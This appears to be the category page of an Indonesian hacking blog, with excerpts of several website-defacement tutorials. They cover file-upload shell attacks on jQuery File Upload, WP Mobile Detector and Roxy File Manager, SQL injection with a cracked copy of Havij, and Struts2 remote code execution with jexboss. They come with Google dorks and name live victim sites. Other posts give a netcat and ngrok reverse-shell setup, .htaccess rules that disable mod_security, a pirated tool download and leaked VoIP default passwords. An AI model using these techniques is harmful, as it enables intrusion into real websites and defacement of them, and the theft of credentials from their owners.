Langsung ke konten utama

Postingan

Menampilkan postingan dengan label Exploit/Vulnerabilities

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...

Cara Deface Jquery File Upload

assalamualaikum wr.wb sore yang cerah untuk bikin post :'v ,kali ini gua bakal share POC Jquery File Upload :'v menurut gue ini cara deface yang paling mudah tapi kita harus pande pande bypass ext shell nya :'v ok kita lanjut ke tutorial Bahan Bahan -Shell ext :php.fla / php56 /php6 /php2 /php1 /.ndsfx / dll -dork : Touch Me  csrf onlen : Mpssh exploit : http://target.com/[path]/server/php/  itu aja :'v Tutorial   yang pertama adalah kita dorking bisa lewat google image ato google biasa klo dorking pake google image ya tinggal pencet images :'v di bawah kolom pencarian contoh w dorking di google image : Google Image ciri ciri vuln ? seperti ini :'v Forbidden ? tinggalkan sadja :'v ok lanjut ekse go to csrf nya :) trus isi url target trus post filenya files [] contoh punya saya : selanjut nya pencet lock target :'v abis itu upload shell klean trus pencet upload gan :'v selanjutnya kita diredirect ke web tersebut lalu mendapatkan pesan sbb : nah klo ...

Cara Deface Dengan SQLI (Havij)

kali ini gua mau share deface dengan sqli with Havij oke sebelumnya gua udah share tools havij ini sekarang gua mau share cara makenya oke langsung aja Bahan Bahan  -Havij Crack nya ( download disini gan ) -google dork : ( download disini ) -Kesabaran :D Tutorial  kita Extrack Havij 1.16 dlu di tempat yang mudah dijangkau contoh Desktop lalu klik kanan pada havij nya lalu Klik Run as admin penampakan havij nya gini gan oke selanjutnya kamu cari target dlu contoh saya ada live target live : www.labooi.com/page.php?articles=17 exploit : site.com/contoh.php?id=69' tambahin petik oke Selanjutnya kita masukin ke havij nya tanpa tanda petik lihat ss diatas, oke selanjut nya adalah kita klik analyze kita tunggu ampe statusnya analyze ok selanjutnya adalah kita lihat tabel database nya pencet tables setelah itu klik get tables ok selanjutnya adalah kita nyari column yang berhubungan dengan user admin pencet get columns  contoh :      user    ...

Wordpress Plugins Mobile Detector Shell Upload

yo :'v dah lama gk ngepos ea ainx gk ada imajinasi buat share tutor :'v nyari exploit baru di exploit-db nemu juga okwowkowk langsung aja Bahan :  dork : inurl:"/wp-content/plugins/wp-mobile-detector/"           *kembangkan bekas defacean kalian oke langsung ke TKP TKP 1. Dorking di google :'v pilih satu gan jangan semua :'v 2.nah klo sudah exploit dengan wp-content/plugins/wp-mobile-detector/resize.php contoh:http://site.com/wp-content/plugins/wp-mobile-detector/resize.php 3.abis itu kita anuin resize.php nya contoh :http://site.com/wp-content/plugins/wp-mobile-detector/resize.php?src=site.com/deface.php *site.com/deface.php nya ganti sama bekas defacean kalian 4.nah klo udah akses deh ^_^ akses ? http://site.com/wp-content/plugins/wp-mobile-detector/cache/shell.php Demo http://www.alrashidschool.com/ischool/wp-content/plugins/wp-mobile-detector/cache/h3.html Kurang Paham ? vidio nya

Cara Deface Roxy File Manager

yu wazzap gaes >:( kali ini gue mao share cara deface dengan Roxy File Manager yaudah berhubung udah malem yaudah deh langsung aja >:( dork: intitle:"Roxy File Manager"          inurl:fileman/uploads/ *kembangkan ext shell : .php56 .php.fla, .php.xxx , .php5 .php6, .php.xxxjpg , .php.orion , .php.h3ll dll pertama klean dorking di google :) trus cari target klean nah abis itu exploit dengan site.com/path/fileman/index.html <- kurang lebih seperti itu :'v Live Target ainx : http://canhogiaresaigon.com.vn/quanly/fileman/index.html abis itu upload shell kalean Foto saat upload shell nah klo kek gitu bisa gan sekarang tinggal akses deh akses ? site.com/path/filemanager/Uploads/shell.php.fla heheheheheheheheeh mudah kan ? Tinggal tebas aja tuh kwowkowkokwowkokw oh iya jan lupa Like fp kita ya hehehehehe

Download Havij 1.16 pro Portable Crack

yup :'v kali ini gua mau share tools andalan gua klo maen sqli yaitu Havij :'v ya sedikit penjelesan tentang havij ini havij adalah sebuah alat untuk melakukan penetrasi terhadap wesite yang mempunyai vulnerability di Sql Injection :'v ini tools karena namanya crack jadi otomatis udah full fiture :'v  ok deh langsung aja ke link donlodnya :'v  Download Gan Lapor Klo link rusak ok ;)

Tutorial Back Connect without port forwading

 yo apa kabar klean hehehehe ;'v disini w mao bagi bagi tutor neh backconnect di shell :'v ok langsung aja pertama kalian download ngrok sama netcatnya  kucing warnetnya : disni https://ngrok.com/ daftar trus download klo udah daftar :''v tinggal login abis login kita dialihkan ke dasboard member nah disini terlihat ada auth token kita copy auth tokennya trus paste ke ngrok  klo udah install auth token kita ketikkan  ngrok.exe tcp 123          nah klo udah kayak gitu buka netcat nya ketikkan nc -lnvp 123 kita ke shell  kurang lebih seperti ss :'v isi servernya 0.tcp.ngrok.io portnya:random number kan 0.tcp.ngrok.io:randomport sukses tinggal kau root 

Tutorial Remote Code Exploit (Apache Struts2)

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution) yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang  Apache struts2 Remote Code Execution sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target  yodah gk usah banyak cocot lagi :'v  Yup Langsung saja Bahan :  Dork :  intitle:"Struts Problem Report" intext:"development mode is enabled." Python <- di sini gaes  jexboss <- di sini gaes  netcat <-  di sini gaes  Langsung Ke tutor 1.Buka CMD lalu ke folder jexboss nya 2.yang ke dua ketikkan  python jexboss.py -u http://targetklean.com  klo vuln ada bacaan vulnerable trus ketik yes 3.sekarang kita coba reverse shell Buka Netcat nya trus ketikkan nc -lnvp 123 habis itu ke jexbossnya...

Tool Untuk Memudahkan Deface , Pybelt

Tool Untuk Memudahkan Deface ,  Pybelt  Jika kalian ingin melalukan peretasan mending gunakan Tools ini :) , mari kita Perkenalkan Tools Pybelt. Pybelt adalah alat memudahkan peretas yang berbasis Python yang mampu memecahkan hash tanpa pengetahuan sebelumnya tentang algoritma, memindai port pada host tertentu, mencari kerentanan SQLi di URL yang diberikan, Mencari Website Dengan Google Dorks tanpa verikasi google, memverifikasi algoritme dari Hash yang diberikan, memindai URL untuk kerentanan XSS, dan menemukan proxy HTTP yang dapat digunakan . Fitur - Fitur :  Port Scanner SQL Injection scanner Dork Checker Hash Cracker Hash Type Verification Proxy Finder XSS Scanner Untuk Melanjutkan Tahap Installan kalian install dahulu Python silahkan download di google ya :) sekarang Download Dahulu Tool Nya :) Download Ekstrak di Local disk C:\ biar mudah :) , dan ubah nama folder tersebut menjadi install ( bebas sih ganti nama aja biar mudah gw pake nama install ) lalu buka cm...

Kumpulan Code Untuk Bypass .Htaccess

Kumpulan Code Untuk Bypass .Htaccess Bete kagak Ngeblog rasa gimana gitu, yah meskipun sedang cuti team wkwkwkkwk :'v Bypass mod security : <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> Bypass symlink : Options All Options +FollowSymLinks +Indexes DirectoryIndex default.html AddType text/html php Atau Bisa juga : OPTIONS Indexes Includes ExecCGI FollowSymLinks AddHandler txt .php AddHandler cgi-script .cgi AddHandler cgi-script .pl OPTIONS Indexes Includes ExecCGI FollowSymLinks Options Indexes FollowSymLinks AddType txt .php AddType text/html .shtml Options All Options All Bypass safe mode : Options +FollowSymLinks DirectoryIndex ssssss.htm Options All Indexes <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckCookieFormat Off SecFilterCheckUnicodeEncoding Off SecFilterNormalizeCookies Off </IfModule> SetEnv PHPRC /home/user/public_html/php.ini suPHP_ConfigPath...

Kumpulan Type-Type Hash & Enkripsi Lengkap!

Kumpulan Type-Type Hash & Enkripsi Lengkap! Biasanya pasti bingung kan jika menemukan password & tidak tahu ? ya ini biasanya yang lagi main SQLI , Lokmed , dll :v , Hash sama dengan kaitannya dengan Enkripsi (decrypt). Nah apakah arti hash itu sendiri ? Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting. Sedangkan Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus. Oke mari kita lanjutt :) DES (Unix) Contoh: IvS7aeT4NzQPM Digunakan di Linux dan OS lain yang sejenis. Panjang: 13 karakter. Keterangan: Dua karakter pertama adalah garam (karakter acak, dalam contoh kita garam adalah string "Iv"), maka ada mengikuti hash yang sebenarnya. Domain Cached Credentials Contoh: Admin: b474d48cdfc4974d86ef4d24904cdd91 Digunakan untuk caching password dari domain Windows. Panjang: 16 bytes. Algoritma: MD4 (. MD4 (Unicode ($ pass)) Unicode (strtolower ($ username)...

Default Password List – 2017 (VoIP)

Pengertian Voice over Internet Protocol (VoIP) adalah teknologi yang mampu mengirimkan data suara, video dan data yang berbentuk paket secara realtime dengan jaringan yang menggunakan Internet Protocol (IP). Dengin ini gw akan share default daftar perankat VoIP dengan nama vendor , user & password :  Sumber ? Leaked :)